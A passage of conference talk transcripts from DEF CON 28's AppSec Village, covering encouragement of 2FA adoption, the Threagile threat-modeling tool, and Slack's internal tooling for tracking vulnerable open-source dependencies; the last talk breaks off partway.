improve the consumer experience, but it often goes unused. I think this is one of the things that we as security professionals, and as people with the ability to encourage others to opt into these more secure measures, need to consider: how can we push people in that direction without increasing too much paranoia? In terms of 2FA adoption, a 2019 BYU study found that people were willing to add 2FA to their accounts if they saw the value in the account, but 13% of participants just thought the inconvenience was too high no matter what. That's because a lot of people believe they're not a target. One research participant said, "I just don't think I have anything that people would want to take from me. So I think that's why I haven't been very worried about it." You can see this with a lot of people in your own life; they don't understand the risk associated with all of their accounts. And maybe that's okay; maybe you don't need to add 2FA to the pizza delivery app you're using.
But how do we encourage people to add stronger authentication methods beyond passwords to things like their email and their bank accounts and other places where that level of paranoia is perhaps justified? Hope is not lost here: awareness and adoption have almost doubled in the last two years. There are reasons for this; Bitcoin has spiked a couple of times in that window, but there are other things we can attribute it to as well. One of these is how we drive adoption of multi-factor authentication: websites are getting more savvy about how they get people to turn on 2FA. Unless you're somebody like Coinbase, you're probably not going to make two-factor authentication mandatory, but you have other options than just hiding it in profile settings where people aren't going to think to look. You can prompt people when they log in, you can offer product incentives, you can have a really annoying and persistent login prompt telling people to turn on additional factors every time they log in. The more annoying you are about it, the more likely people are to turn it on, but that also increases friction, and you don't want to annoy your customers too much. We do know strategies like product incentives work from looking at the Google Trends data for 2FA searches. See if you can guess what the spike in August 2018 was: it's only gone up from there, but it was pretty flat for many, many years leading up to that. That was when Fortnite decided to offer in-game incentives for its users to turn on 2FA. If you're not familiar with Fortnite, it's an incredibly popular video game, and video game companies are some of the ones that have gotten most creative with the incentives they offer people. One, because there's in-game trading that has real monetary consequences for their users, and two, because some of the incentives they can offer don't actually cost them a lot of money. Even two years later, three of the top five related search queries for 2FA have to do with Fortnite, and three of the top five related topics have to do with video games; Epic Games is the company that owns Fortnite. They aren't the only ones offering incentives; lots of gaming companies are offering incentives like that, and there are other companies offering product incentives as well. A good example is Mailchimp, which offers a 10% discount for three months to users that turn on 2FA. So you can weigh the trade-off of what would be valuable to your company: what is the account takeover risk, what is the loss you're experiencing from something like this, and does it make sense to offer product incentives or discounts to customers that might get them to opt into additional security? And like anything, you want to make sure you measure how effective this was. Ideally you would set these measures before you embark on this kind of journey, but here are some of the things I encourage people to think about as they measure the effectiveness of their authentication strategies; this is going to depend on your business, but one option is total losses due to account takeover. You probably want to see that number go down.
You might also want to care about the total number of compromised accounts, decreasing the number of customers who actually have their accounts taken over. One thing I think is really important to look at is the support costs related to these losses. If you start requiring or encouraging a lot more two-factor authentication, there are going to be additional support hurdles. Especially on the account recovery side, people are going to get locked out of their accounts more often, and you want a smooth path, hopefully self-service, and hopefully you've enabled three or four factors so they can regain access to their accounts if they lose access to any one of their factors. But you also want to make sure you've equipped support with the tools to securely and safely get people back into their accounts; even if this takes more of the support team's time, it might be worth it overall. And finally, you just want to make sure that user satisfaction is at least staying the same, if not going up. If you're doing something like really persistent login prompts for turning on 2FA, you want to make sure you're not annoying your customers too much overall. There's definitely no one-size-fits-all solution here, but the advice I end up giving a lot of folks boils down to this: delight your most security-conscious users. You don't want people who are paranoid with good reason, who have higher security needs and concerns, to be upset by the lack of options you provide, but you do want to provide options for the rest. You don't necessarily need to force everybody on your consumer website to use TOTP or a YubiKey or anything like that, but you want to make sure it's usable for people depending on the risk they're willing to accept. Because as the security researcher Cormac Herley says, when we exaggerate all dangers, we simply train users to ignore us. I hope I've given you some inspiration for how to think about your authentication systems. I'll be around; you can find me on Discord, you can find me on Twitter. If you have any questions, once again, my name is Kelly Robinson, and thank you for listening.
|
Security professionals agree: SMS based Two-factor Authentication (2FA) is insecure, yet thousands of companies still employ this method to secure their customer-facing applications. This talk will look at the evolution of authentication and provide a data-driven analysis of the tradeoffs between the different types of factors available.
|
10.5446/51621 (DOI)
|
Good morning, good afternoon, and good evening to our fellow viewers across the globe. My name is Joe Christian and I'd like to personally welcome you to day three of AppSec Village at DEF CON 28. First, I'd like to thank our sponsors, Checkmarx, Google, and Offensive Security. Without them, we could not have provided you all this amazing village this year. I'd like to issue another thank you to DEF CON and all of our volunteers for the blood, sweat, and tears poured into this incredible effort. Lastly, I'd like to thank the community for supporting us another wonderful year. This village is for you. With that being said, I'd like to introduce our first speaker today, Christian Schneider. Christian's talk is titled Threagile: Agile Threat Modeling with Open Source Tools from within Your IDE. Christian has pursued a successful career as a freelance Java software developer since 1997 and expanded in 2005 to include a focus on IT security. His major areas of work are penetration testing, security architecture consulting, and threat modeling. As a trainer, Christian regularly conducts in-house training courses on topics like web application security and coaches agile projects to include security as part of their processes by applying DevSecOps concepts. Christian regularly enjoys speaking and giving trainings at major national and international conferences. Please give a warm welcome to Christian. Hello. Welcome to my talk. My name is Christian Schneider and I'd like to introduce you to Threagile, the new open source toolkit for agile threat modeling. I'm working as a freelance security architect, penetration tester, and trainer, mainly focusing on areas like DevSecOps, security architecture consulting, and agile threat modeling. With Threagile, the idea is to bridge the gap between classic, more workshop-like threat modeling approaches and agile development, with its fast pace of rollouts and commits and, using DevSecOps approaches, very quick rollouts into production, without neglecting threat modeling in these kinds of setups. The idea is to let developers create a declarative threat model inside their IDE, so they are not required to go to a different tool or switch their mode of operation; they just maintain, in a declarative fashion, everything about their application and architecture in a simple, human-readable YAML file. That includes, like classic threat modeling approaches, the data assets, the technical components, the communication links (the data flows) between them, and the trust boundaries that might be crossed by communication links. That YAML file can be checked into the source tree like any other artifact, so it's diffable, collaboration-capable, testable, and verifiable, and you can easily start it along with the project. And the modeled elements, especially the technical elements in that YAML file, contain a very detailed level of the technology and protocols that are chosen, in order to get good risk generation from the risk rules. So Threagile has a set of built-in risk rules that analyze the model, treat it as a connected graph of components, and derive from it potential risks and threats, hardening recommendations, documentation, model graphs, data flow diagrams, and different output formats.
And even custom risks can be added, because with any tool you cannot identify every risk, so you need manually identified risks that can be added to the model as well; sometimes in these kinds of workshops you come up with new risks that have not been identified by any kind of tool, and these can be added into the YAML file too. Threagile is a technology-aware way of modeling your architecture: you define what type of technology is used and what protocols are used, so it understands from that, for example, whether something is encrypted or not. It has around 40 risk rules, the set is growing, and you can even create custom risk rules. It calculates an attacker attractiveness value and data loss probabilities, more on that later, and you can even automate things using model macros in a wizard-style approach. Even the risk mitigation can be maintained in that YAML file, so that the risk tracking and the remaining risks you want to accept are documented that way. And of course, it's released as open source software. You basically run Threagile as a command line interface, it's shipped as a Docker container, or you can execute it as a web server with a REST interface. Here you just see the command line interface with a few of the many switches and options you can use. The first steps with Threagile are to create either a minimal stub model, which Threagile can generate as well, or a filled example model if you want to play with it and see how it works. It basically contains the YAML file that is the input into Threagile: the data assets, the technical assets, the communication links, and the trust boundaries, and a little bit more if you like. Here you see a YAML example of a data asset, customer contracts, which has some kind of owner and some kind of origin; especially the confidentiality, integrity, and availability ratings are interesting, so you can rate how confidential the data assets are, for example. And you can model technical assets in that YAML file as well. For example, here is an Apache web server where you can define, again, the confidentiality, integrity, and availability ratings, but you can also define a technology out of a bunch of possible technologies. You can define a little bit more: whether it's used by a human, which would be more like a client or browser, what type it is, like process, external entity, or data store, you can tag it if you like, and whether it's encrypted or not. So there are a few questions you answer there as well. Then you reference the data assets that are processed or stored on that technical asset just by their ID. From the ID referencing, Threagile learns the distribution of data that is stored and processed on those technical assets. And then you just model the communication links, basically pointing from one technical asset to another, so it's an outgoing communication link. You can attribute that with the kind of protocol being used, whether it's, let's say, HTTPS here, or it could be FTP, or whatever you like; there's a big list of protocol values you can choose from, and Threagile even knows whether it's an encrypted or unencrypted protocol. You can define what kind of authentication is happening, whether the communication link is not authenticated, or just uses credentials, or a token-based approach.
And if it's authenticated, you can define what kind of authorization it uses, either a technical user or an end-user identity, or something like that. You can answer a few more questions, and you reference the data assets that are sent and eventually received over that communication link. Finally, you model the trust boundaries. These are basically the, let's say, virtual network areas where you want some kind of network trust boundary between them, or, in a containerized world, eventually namespace isolation or something like that. Different types of trust boundaries exist, and then you just reference the technical assets that are used inside. And if you nest trust boundaries, which is definitely possible, you can reference them as well. Then, when you execute Threagile on the command line, it processes the YAML input and applies the risk rules. There are lots of built-in risk rules, you can even add your custom ones, and it creates some nice output. First of all, here's an example: it generates a model graph so you can see whether you have modeled something wrong or something is missing from your architecture. The colors of the lines as well as the shapes refer, depending on the ratings of the data stored there, to the sensitivity of that asset. So a red border means very sensitive data is stored there, a red line means very sensitive data is being transferred, a color like the yellow one means there's custom-developed code, and the shape depends a little bit on whether it's a data store, process, external entity, or a client used by a human. So there's a set of semantics behind these colors. It also generates a PDF and an Excel report. The PDF is quite long, so it also serves as a documentation artifact, and it has some redundancy because it has two different views: a view of risks by vulnerability category and a view of risks by technical asset. So let's dive a little bit into the generated reports. You see a management summary with pie charts of the risk severities and the risk tracking states, and you can add your own management summary text as well. You've got the impact, basically the impact of the identified risks, including an individually added one here, the critical one, more on that later. And you can also see the risk mitigation chart here: bar charts showing the distribution of the identified risks grouped by tracking state, which you maintain in the YAML file as well. So you can have something that's in progress here in blue, or mitigated in green, or something that has been accepted as a risk in pink, and the red ones are just unchecked. And you've got the impact analysis of the remaining ones. Also, for classic threat modeling, you do have the STRIDE classification of the identified risks: spoofing, tampering, repudiation, information disclosure, and the other categories. And you've got an assignment by function, so which party in a corporation or team should handle that kind of risk, who should address it: business side, architecture side, development, operations, something like that. Threagile also calculates the RAA, the relative attacker attractiveness value, which is just a percentage value ranging from 0 to 100%.
The higher the value, the more attractive the technical asset is for attackers. These values are assigned to technical assets, and there's an algorithm behind it which is pluggable, so you can plug in your own custom algorithm if you like. That algorithm basically takes into account the amount and the sensitivity of data on the assets as well as the communication links and the paths that attackers can take to reach them. So if a sibling of another system holds less sensitive data but connects to a system carrying very sensitive data, that neighboring system is also rated a little bit higher. DLP, data loss probabilities, are also calculated. Here you see, inside the report, a graph which on the left side contains lots of red data assets, and on the right side the shapes are basically the components; the arrows, depending on whether they're dashed or solid, show whether the data is processed on that asset or stored on that asset. And depending on the sensitivity of the data, you can see here whether you eventually have some risks you might want to handle. The colors here reflect the data loss probability, which depends on how many technical assets the data assets are stored or processed on, and how many risks there are on those assets that might have a blast impact of losing that data. So in the detailed report, you even have the individual risks listed that you should mitigate, especially the red ones, where going from red to amber or an even better color would yield the biggest benefit in terms of not risking data loss. That way you can prioritize your mitigation efforts based on the risk of losing the data. The risk mitigation recommendations are also generated here: you see some server-side request forgery or XML external entity attack examples here, with risk mitigation texts including links to the OWASP ASVS chapters and, where available for that kind of risk, the OWASP cheat sheet, giving the developer teams some hints on how to mitigate it. The risk instances are also obviously inside the report. Everything is linked and clickable, so you can easily navigate around in the report, and you have it either grouped by vulnerability type on the left side, or on the right side you've got the risks by technical asset, so you can get from that view to the risks and the descriptions of how to mitigate them. Of course you also get the Excel report for easier filtering, sorting, and things like that: same data, different format. And being DevSecOps ready means the results are also available as JSON output, so you can process them inside Jenkins, GitLab CI, or whatever other kind of DevSecOps pipeline you like. CI/CD pipelines can then execute Threagile on the command line or via the REST server, depending on what you want to do, and the result is a JSON file listing the remaining risks and their distribution across the different severity levels; you can then, for example, automatically break a build if it still includes some yet unchecked high risks. As for the risk rules, that's a constantly growing set, around 40 of them right now, and you can extend it with more risk rules if you like. And risk rules are written in Go inside Threagile.
Threagile itself is written completely in Go. Here you see an example of a risk rule, an LDAP injection rule: you have a category definition with the texts, the cheat sheet links, and basically the metadata so that the report is generated properly for that kind of risk, and on the right side you see the very simple code to identify those risks. It's basically graph inspection of the assets that you modeled and the communication links that you modeled. If you like, you can even add manually identified risks to Threagile in the same YAML file. So the same input file can include manually identified risks, the ones that are not usually identifiable by a tool. For example, in a classic threat modeling workshop you identify those additional risks, and you don't want to track them in a separate way; you want to keep them in the same way that you track the tool-identified risks inside Threagile, and that can be done by simply enhancing the YAML input file with individual risks. Here you provide the metadata: the text describing the risk you identified, how it should be mitigated, and so on, basically as values inside the YAML file. And on the right side you see that this risk has two instances, so it has been identified, for example, on some database and some file system server here, and you can even link to the technical assets that have the most relevance of losing that kind of data when the risk manifests itself. That way the blast impact, the data loss probability, is also reflected by that manually added risk. You do have very good editing support in IDEs for YAML files; that's been around for some time, even in vi if you like. There are many YAML editors available, and it's easily readable by humans. For example, in my IDE I have here on the right side a tree that I can click to navigate inside the YAML file, automatically populated from the structure of the YAML file, so that's definitely something with very good IDE support. It doesn't stop there; it goes even into schema validation and auto-completion. Threagile supports IDEs by having a YAML schema available for the Threagile model. That basically means you can import that schema into the IDE and then you have automated checking of the syntax and you get error flags; for example, here on the left side I've got a typo in the web server technology value, so that's flagged as an invalid technology type, something the IDE validated thanks to the schema. And that schema also gives me auto-completion: when I type "web" in the technology field and hit Ctrl+Space, the popup includes everything that begins with "web", like web application, web server, and so on. So that's auto-completion you get for free by simply importing the Threagile YAML schema into whatever IDE or YAML editor you use. You can also have live templates for quicker editing when creating those elements, like technical assets, communication links, or data assets.
Importing these templates in major IDEs allows you to just type the technical asset template shortcut, hit enter, and bam, you've got a pre-populated template where you just give it a name, then tab through the elements and hit Ctrl+Space to open the auto-completion popups; it's a little bit like the Zen Coding style. Definitely something nice. And we do have model macros inside Threagile. That's basically an interactive wizard, a little bit like a state machine, and each model macro has a set of questions that are asked in a sequential, interactive way. Each model macro reads the YAML file of an existing model and asks you what you would like to do. We have different model macros, like adding a build pipeline, adding a vault, or adding an identity provider including an identity storage to the model. That way you can codify and reuse the kinds of repeating model elements you have in your corporation or your teams, make them a little bit individual through the questions you ask the user, and modify the model files in a very easy way. The plug-in interface also allows you to create your own model macros. So how does this look? It's on the command line. Here, for example, is an add-build-pipeline model macro with just a few questions that you answer, and then you can select which components this build pipeline should deploy to, for example. It reads the model and modifies it accordingly, it can create new trust boundaries for that, you choose whether it's push-based or pull-based deployment, more in the GitOps style, and then you get a summary, like a dry run of what would be added to the model: new data assets, new technical assets including the communication links, new trust boundaries. All these modifications are then done automatically, and as a result you get the communication paths added as well. What about risk tracking? Inside the YAML file you also have a way to track the identified risks by a unique risk ID, and you can even group them with wildcards to have sets of risks of the same type for the same component, or something like that, tracked in the same style. You can assign a status: unchecked, which is the default state if it's not being tracked yet; in discussion; accepted, where it just remains as a remaining risk; in progress, meaning you're working on mitigating it; mitigated; or false positive, because sometimes tools definitely have false positives. And you can add a justification; optionally you can add a ticket ID, a date, and a tracked-by name tag, so you can track that in a very good way. There's even a model macro that reads an existing YAML file, applies the risk tracking, and generates the yet-untracked risk instance IDs with the unchecked state, which you can then individually shift to some other state. And out of the risk tracking definitions in the same YAML file you get the risk mitigation state you saw earlier in the talk in the PDF report; you see it on the right side. What about bigger models? Of course even bigger models work well, and even way bigger models, something we tried in beta testing of Threagile, work quite well.
Also, a REST server exists inside Threagile, so in the Docker container you have a way to start it and expose a port, and that port basically gives you a way to use Threagile like a REST API. That means you can send in the YAML file and get back a zip file containing all the artifacts that Threagile generates. In the next version you can also create a model on the server side, stored in an encrypted fashion, and then add data assets to it, add technical assets to it, add communication links to it, apply the risk tracking, and import or export the model file, things like that. And if you want to play with it a little bit, there's even a playground online at run.threagile.io. So what are the possible effects of modeling threats in a YAML file and letting the risks and threats be generated by an open source tool that way, without leaving the IDE? Making the risk rating scheme and the risk rules pluggable means that corporations can have their individual policies coded in easy-to-code Golang risk rules, and these custom-coded risk rules can analyze the model graph according to the corporation's individual policies. Also, if many more projects use it inside a corporation, you can for example build uniform documentation of the system landscape bottom-up, project by project, system by system, and try to link them in a good way if you like. And it's built by the dev teams in their IDEs; they're not leaving their tools of choice, they do it in their favorite IDE, and it just runs along within the code base, checked in as a YAML file, that's it. So it's easy to keep it up to date compared to classic threat modeling approaches, and it's a way to have continuous threat modeling. It's easy to instantly regenerate the risk landscape for a project: if something changes, for example a data classification becomes more confidential, or some component is moved into the cloud, you can just regenerate it and see if new risks emerge from that change. And you can do that instant risk regeneration even on the corporate level: for example, when a policy changes or new policies are introduced, some new regulatory policies for instance, you can adjust your custom risk rules accordingly, or create a new one, and then just execute Threagile on all of your projects; you might then see which of these projects eventually have some to-dos to mitigate newly emerging risks that don't match a new policy that has been put into place. Also, CI/CD pipelines can check the generated JSON to automatically fail the build, or at least flag it as unstable, if some unmitigated high risks are still there. Having the risk tracking state inside Threagile, and thereby the remaining risks, means you can just evaluate that data in the JSON file and fail the build if you want to avoid an automatic rollout into production where new high risks have not yet been checked. So that's something that is definitely ready for DevSecOps approaches; threat modeling becomes a continuous part of a DevSecOps approach, and that's basically what Threagile is about: agile threat modeling.
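As a rough sketch of that kind of pipeline gate, the following Python snippet reads a risks JSON export and fails the build when unchecked high or critical risks remain. The field names ("severity", "risk_status", "title") are assumptions for illustration, not the verified Threagile output schema; check the JSON your Threagile version actually produces before wiring something like this into a pipeline.

import json
import sys

# Assumed shape: a list of risk objects with "severity", "risk_status", and "title" fields.
with open("risks.json") as f:
    risks = json.load(f)

blocking = [
    r for r in risks
    if r.get("severity") in ("high", "critical") and r.get("risk_status") == "unchecked"
]

for r in blocking:
    print(f"UNCHECKED {r.get('severity', '').upper()}: {r.get('title', r)}")

# A non-zero exit code fails the CI/CD step and stops the rollout.
sys.exit(1 if blocking else 0)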
Hopefully security is then less of a bottleneck for threat model sign-offs; that basically means the security team can focus more on the individual risks and not on the standard ones that are easy to identify with coded risk rules. It also shifts things more to the left: with development teams maintaining and creating the YAML file from early on, you get a very early integration of threat modeling that doesn't create bottleneck effects on your security work. It's released as an open source tool; the website is threagile.io, there's a playground available at run.threagile.io, the source is available on GitHub, and Docker images are available as well. If you have any questions, feel free to ask; you've got my contact data there as well. Special thanks for the valuable feedback from all the beta users, and especially to those listed here, in alphabetical order, the very early adopters of Threagile who gave very valuable feedback. Thanks, and I'd like to thank you as well; a little bit of Q&A if you like, and I look forward to seeing you later in the chat.
|
The open-source tool Threagile enables agile teams to create a threat model directly from within the IDE using a declarative approach: Given information about the data assets, technical assets, communication links, and trust boundaries as input in a simple to maintain YAML file, it executes a set of over 40 built-in risk rules, which can be extended with custom risk rules, against the processed model. The resulting artifacts are graphical diagrams, Excel, and PDF reports about the identified risks, their rating, and the mitigation steps as well as risk tracking state. DevSecOps pipelines can be enriched with Threagile as well to process the JSON output.
|
10.5446/51622 (DOI)
|
Hello and welcome to 10,000 Dependencies Under the Sea: Exploring and Securing Open Source Dependencies. My name is Greg Horton. I'm a product security engineer at Slack. And I'm Ryan Slamo, an associate software engineer on the product security foundations team. At Slack, AppSec is product security. Our product security organization is split into Classic and Foundations. Classic was the original team, and they focus on most of the traditional AppSec responsibilities, like reviewing new features, penetration testing, and running a healthy bug bounty program. I'm on the Foundations team, which focuses on reducing risk through automated tooling and creating secure-by-default libraries and patterns. Both of these teams work together to ensure the security of Slack, the product, using a multifaceted approach. For some context, what is Slack? Slack is a channel-based messaging platform, and with Slack, people can work together more effectively, connect all their tools and services, and find the information they need to do their best work, all within a secure enterprise-grade environment. Let's begin by talking a bit about the Slack stack. Users expect Slack to work everywhere. To that end, we use and are a partial maintainer of the Electron project for a consistent experience across devices. In practice, this means our front-end web code also runs in all of our desktop clients. Our back-end is primarily in Hacklang, Facebook's fork of PHP with strong typing and other enhancements. We also have some services written in Go, like our caching layer. Finally, our mobile apps are primarily in Swift and Kotlin, but we won't be talking about them much today. Today, we'll be talking about an OWASP Top Ten issue: using components with known vulnerabilities. Specifically, we'll be focusing on vulnerability management for third-party dependencies. Our story today begins with an intern project. Matt Dwanzek and I, who are now full-time engineers at Slack, were interning on the Product Security Foundations team last summer. When we got there, we were given an open-ended project of understanding and limiting our dependency risk. Today, we'll walk you through our journey building a tool, and Greg will walk you through how we implemented the tool and built a process around it to actually limit the risk at Slack. Modern code bases often require tons of third-party code. At Slack, we have one main repository that contains our entire front-end and most of our back-end. Our main repository currently requires over 6,500 packages. A year ago, we had half that. This trend would be concerning if we didn't have systems in place to limit risk. All of our first-party code has to be reviewed, but what about random stuff you find on GitHub? Is that exempt? Clearly, some process must be in place to manage risk. It's important to note that we have a mature process for adding packages, and the count still doubled in a year. For PRs that add packages, developers have to explain why the package is needed. Packages must be actively maintained and save meaningful engineering effort over just building the functionality ourselves. Additionally, all packages are assigned a team or a directly responsible individual to update and maintain them. This is especially important for security updates and fixes. So how did our package count double? In a word: npm. We only directly require around 350 packages in our package.json. However, when you resolve the nested dependencies, our dependency tree expands to almost 6,500 unique versions of packages.
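To make that expansion concrete, here is a small Python sketch that walks an npm lockfile and counts the unique name@version pairs in the resolved tree. It assumes the older v1-style package-lock.json layout, where transitive dependencies are nested under a "dependencies" key; newer lockfile versions flatten everything under a "packages" key instead, so treat this as an illustration rather than a general-purpose parser.

import json

def collect(deps: dict, seen: set) -> None:
    """Recursively record unique name@version pairs from a v1-style 'dependencies' tree."""
    for name, info in (deps or {}).items():
        seen.add(f"{name}@{info.get('version')}")
        collect(info.get("dependencies", {}), seen)   # nested, i.e. transitive, dependencies

with open("package-lock.json") as f:
    lock = json.load(f)

unique_versions: set = set()
collect(lock.get("dependencies", {}), unique_versions)
print(f"{len(unique_versions)} unique package versions in the resolved tree")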
Running this much third-party code can be a risk. The downside of using common software is that we often find out about vulnerabilities at the same time as everyone else. Let's take a look at some examples of related issues. One of the most notable was Equifax. Equifax got hacked because they were running an old version of Apache Struts that had known vulnerabilities. This hack leaked 143 million social security numbers. Preventing this could have been as simple as upgrading their version of Apache Struts to one that did not have publicly known vulnerabilities. Vulnerabilities are also discovered in old versions of popular npm packages. For example, both of these advisories were issued this year. Next.js and AngularJS are respected, well-maintained packages, but running old versions of those in your production code bases without adequately maintaining them is a recipe for disaster, because new vulnerabilities can be discovered at any time, no matter how many years you've been running the same code. npm has also had issues with malicious code in popular packages. For example, event-stream, which was a popular npm library, required a dependency that had been compromised, and that compromised dependency included a targeted Bitcoin wallet stealer; that malicious code was downloaded over 8 million times. eslint-scope is an even more popular npm package used for linting JavaScript code, and a compromised version was uploaded that exfiltrated .npmrc files, which contain package publishing credentials. Those credentials could allow an attacker to push a new version of a package as a semver patch with malicious code, and because of the way npm's semver ranges work, installations of that package would automatically upgrade to the malicious code. And here are some figures that might be slightly biased: Snyk found an 88% increase in library vulnerabilities over the past two years, and 78% of the vulnerabilities that they found are in indirect dependencies. Just take a look at our dependency tree from earlier to understand why. When we only require 345 but end up with almost 6,500 packages, there's a lot more code beneath the surface than on top of it. And we're not the only ones who have this problem. Our customers know about this problem, and they ask us about it. We need a good program in place so we can show them that we take care of their data and we limit risk. So what do we do about this problem? When we started, we defined three goals for a good solution. The first is that we want to detect vulnerabilities as soon as they're publicly available, because we want to be on top of the fixes as quickly as possible. Second, we want to track any vulnerabilities or weaknesses in our codebase; we want insight into where we have risk so we can better fix it. Finally, we want to alert when we have a problem. No developer should ever have to think, oh, I should scan my repo before I deploy to production. We want to alert on vulnerabilities so this just happens automatically. The next question we asked was, can we use an off-the-shelf tool? But our requirements ended up making that surprisingly difficult. First of all, we use Hacklang, which is not a popular language outside Facebook, so it was difficult to find vendors that supported it. Second, we use GitHub Enterprise rather than GitHub Cloud, which makes it harder to use Dependabot, because Dependabot still isn't out for GitHub Enterprise, and it was even further from being out a year ago when we began this journey.
Next, we needed a tool that would scan entire dependency trees. Knowing about vulnerabilities in packages we require directly isn't enough. As we saw earlier, there are so many more packages beneath the surface, and we need to make sure those are a stable foundation we can build our app on. And at Slack, we're heavy users of Slack as a product; all of our alerts and things like that just go into Slack, so we need a tool that supports routing alerts for different code bases or packages to different teams. And finally, you might be saying, oh, we're a vendor and we have a tool that does all that. But we're still a relatively small company, and we need something that's not going to cost us millions of dollars over the next few years. So we built Ossify. Our solutions to the three points mentioned earlier were, first, detection: we run daily scans of our code bases to figure out which packages we're requiring, and we upload those packages to the Sonatype open source vulnerability index to see if there are any new vulnerabilities reported for them. Second, we built a dashboard to track the status of repositories as well as remediation efforts for individual findings. And finally, we built robust Slack alerting, which will be covered more later. Ossify supports three package ecosystems. The first, of course, is Hacklang, because that's our backend and that's where some of the most dangerous possibilities are. We added custom metadata to track the upstream Composer packages, because we had to manually fork and vendor some of these packages to add strong types and other Hacklang features. Second, we added npm, because npm is by far our biggest source of packages, and we found by far the most findings coming from npm packages. And finally, we added Go support, because a number of our high-value services, like our caching layer, are written in Go. Here is what the Ossify dashboard looks like. This is an example repository created for this demo, just to show you what it looks like when you scan a repository. We support scanning multiple branches, which could potentially be used for future CI integration. Here we have an example finding page. This is for node-forge, which was being pulled in by our sample repo's package.json. node-forge has a weakness, but we don't actually require node-forge directly; instead, we require a Google auth library, all the way on the left. We built out a dependency graph tool because we want our developers to understand where the vulnerability is coming from and which packages need to be upgraded or removed to fix the issue. Here's a more complicated dependency graph, from a dev dependency. The weakness was on the right, in is-url. However, if you trace back all the way to the left, it was actually some gulp plugins we were using as part of a build process that were pulling in the weak version of is-url. And finally, like any good security tool, it comes with dark mode. Now I'm going to hand things off to Greg to cover everything that happened after the original development of the tool. Thanks, Ryan, for that great overview of the tool. So now that we have this fully featured tool that did everything we wanted, it was time to integrate it into our wider processes here at Slack. This would be easy, right? We have an app that scans our repositories, looks at our third-party dependencies, sees if there are vulnerabilities, and then lets us know about them.
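For a sense of what that kind of daily lookup could look like, here is a hedged Python sketch that posts a couple of package coordinates to Sonatype's public OSS Index component-report endpoint and prints any reported vulnerabilities. The package versions are made up for illustration, this is not Ossify's actual implementation, and the exact request and response fields should be verified against the current OSS Index API documentation before relying on them.

import json
import urllib.request

# Coordinates use the package-url (purl) format; versions here are illustrative only.
coordinates = ["pkg:npm/node-forge@0.9.0", "pkg:npm/is-url@1.2.2"]

req = urllib.request.Request(
    "https://ossindex.sonatype.org/api/v3/component-report",
    data=json.dumps({"coordinates": coordinates}).encode(),
    headers={"Content-Type": "application/json"},
)

with urllib.request.urlopen(req) as resp:
    for report in json.load(resp):
        for vuln in report.get("vulnerabilities", []):
            # Assumed response fields; check the API docs for the authoritative schema.
            print(report.get("coordinates"), vuln.get("cvssScore"), vuln.get("title"))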
So our first workflow for this tool was that Ossify would scan daily and then post to a Slack channel any currently known vulnerabilities. And using the power of Slack, we could make Slack notifications that were actionable, meaning that we could give the information that is needed for quick remediation. They were non-obtrusive, so we could set those notifications to snooze or ignore if they weren't relevant to us. And we could make them configurable, so we could notify individual users and specific channels about these dependencies. Here's an example of what those looked like. So as you can see, this dependency detection is the app. It's scanned a repository, it found some vulnerabilities in some third party libraries, and it would tell us about them. And as you can see also, you could set them to ignore, you could snooze them, etc. But the problem with that is that this channel was way too noisy. Every single day it was posting all the vulnerabilities that had been found and hadn't been remediated yet. So it would repeat a lot of the ones that we'd seen the day before. Maybe we didn't want to ignore them yet because they were still relevant or we were still trying to find somebody to fix them. But it was a very long list, and so we couldn't really work them down in this format. And also, blindly throwing them into a channel made it everybody's problem, which in practice made it nobody's problem. Nobody took initiative to see which vulnerabilities were actually a threat to us, and nobody was taking responsibility to fix them. So it was pretty ineffective at solving our main problem at first. So we had to go back to the drawing board and figure that out. We had to admit that Ossify was an effective tool, but it was not only reporting vulnerabilities, it was also acting as an internal ticketing system, which is not something we wanted to maintain long term. We wanted Ossify to do one thing well: find vulnerabilities and report them. And to do this, we had some prior art that we could work from to figure out the best way to do that at Slack. And that answer was Jira. We have a Jira system. We have security tickets that go into our Jira that can be acted upon by developers. And so our solution was to put it in Jira. You know, at Slack, we have a method already for triaging security based tickets that come from multiple sources, say if we have bug bounty reports or internal findings. Our SLAs, or service level agreements, are 180 days for low tickets, 90 days for mediums, 30 days for highs, and then seven days for critical findings. So pushing these vulnerable library upgrades into a ticket in Jira put them into processes that our developers already know. It doesn't add in any more friction, and it puts them into an established workflow that also ties to company wide objectives. So upgrading these libraries just can't be another thing that developers ignore. They have to do it to meet their OKRs. So now that we had a new flow, we had a new way of dealing with and finding these vulnerable libraries. Our new flow is that Ossify would find the vulnerability, and then we would throw it right into Jira and file a ticket. If multiple vulnerabilities were caused by the same package, we would roll those up into the same ticket. Say you have a couple of highs and a few mediums, but they all would be remediated by upgrading a single package to a certain version. That would be one ticket. So we weren't making multiple tickets for multiple vulnerabilities per se.
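For readers who want to picture the "one ticket per vulnerable package" roll-up, here is an illustrative TypeScript sketch: group findings by package, then create a single issue per group through the standard Jira REST API. The Jira URL, project key, credentials, and finding shape are all placeholders of my own; this is not the tooling described in the talk.

```typescript
// Illustrative roll-up: one Jira ticket per vulnerable package, however many
// advisories that package has. Uses the standard Jira REST v2 "create issue" call.
interface Finding {
  packageName: string;
  advisoryId: string;
  severity: "low" | "medium" | "high" | "critical";
}

const JIRA_URL = "https://jira.example.com"; // placeholder instance
const AUTH = "Basic " + Buffer.from("bot-user:api-token").toString("base64"); // placeholder creds

async function fileTickets(findings: Finding[]): Promise<void> {
  // Roll multiple findings for the same package into one ticket.
  const byPackage = new Map<string, Finding[]>();
  for (const f of findings) {
    byPackage.set(f.packageName, [...(byPackage.get(f.packageName) ?? []), f]);
  }
  for (const [pkg, group] of byPackage) {
    const issue = {
      fields: {
        project: { key: "SEC" },            // illustrative project key
        issuetype: { name: "Task" },
        summary: `Upgrade ${pkg} (${group.length} finding(s))`,
        description: group.map((f) => `${f.advisoryId} [${f.severity}]`).join("\n"),
      },
    };
    await fetch(`${JIRA_URL}/rest/api/2/issue`, {
      method: "POST",
      headers: { "Content-Type": "application/json", Authorization: AUTH },
      body: JSON.stringify(issue),
    });
  }
}
```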
